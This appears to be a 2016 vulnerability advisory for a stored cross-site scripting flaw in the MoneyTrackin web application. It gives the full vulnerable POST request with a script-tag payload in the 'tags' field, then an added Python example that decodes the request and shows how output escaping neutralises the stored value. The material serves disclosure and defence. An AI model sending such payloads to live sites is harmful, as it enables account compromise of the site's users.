MoneyTrackin Web Application suffers from a persistent cross-site scripting vulnerability.
6402aae158ad1102885aef5e05fc5dcb6d5bd711801b982df72a5e5137bc6f0c
# Exploit Title: MoneyTrackin Web Application - Stored Cross-Site Scripting (XSS)
# Date: 6/24/16
# Exploit Author: Brett DeWall
# Exploit Author Twitter: @xbadbiddyx
# Exploit Author Blog: http://xbadbiddyx.tumblr.com
# Vendor Homepage: https://www.moneytrackin.com/
# Version: Latest commit
# Contacted Vendor Date: 6/18/16
### Vulnerable Request
Request
POST /accounting/create_transaction/?project=NULL HTTP/1.1
Host: www.moneytrackin.com

project=NULL&description=Vuln-Test&amount=1000&date=17%2F06%2F2016&tags=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sent=1&clientDate=2016-06-17&oldproject=NULL
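The request above, decoded to show which field carries markup and how output encoding neutralizes it when the stored value is rendered. This is an added example, not code from the advisory or from MoneyTrackin; the render functions and the `<td class="tags">` template are hypothetical stand-ins for the application's transaction view.

```python
import html
from urllib.parse import parse_qs

# Form body copied from the vulnerable request on this page.
BODY = (
    "project=NULL&description=Vuln-Test&amount=1000&date=17%2F06%2F2016"
    "&tags=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"
    "&sent=1&clientDate=2016-06-17&oldproject=NULL"
)

HTML_METACHARS = "<>\"'&"


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into a flat dict."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def fields_with_markup(fields):
    """Names of fields whose decoded value contains HTML metacharacters."""
    return sorted(
        name for name, value in fields.items()
        if any(ch in value for ch in HTML_METACHARS)
    )


def render_tags_unsafe(stored_tags):
    """Hypothetical 'before': the stored value is written into the page as-is."""
    return '<td class="tags">' + stored_tags + "</td>"


def render_tags_safe(stored_tags):
    """Hypothetical 'after': the stored value is HTML-escaped at output time."""
    return '<td class="tags">' + html.escape(stored_tags, quote=True) + "</td>"


if __name__ == "__main__":
    fields = parse_form(BODY)
    print("fields carrying markup:", fields_with_markup(fields))
    print("unsafe:", render_tags_unsafe(fields["tags"]))
    print("safe:  ", render_tags_safe(fields["tags"]))
```

Escaping at render time covers values already stored before a fix is deployed, which input filtering on `create_transaction` alone would not.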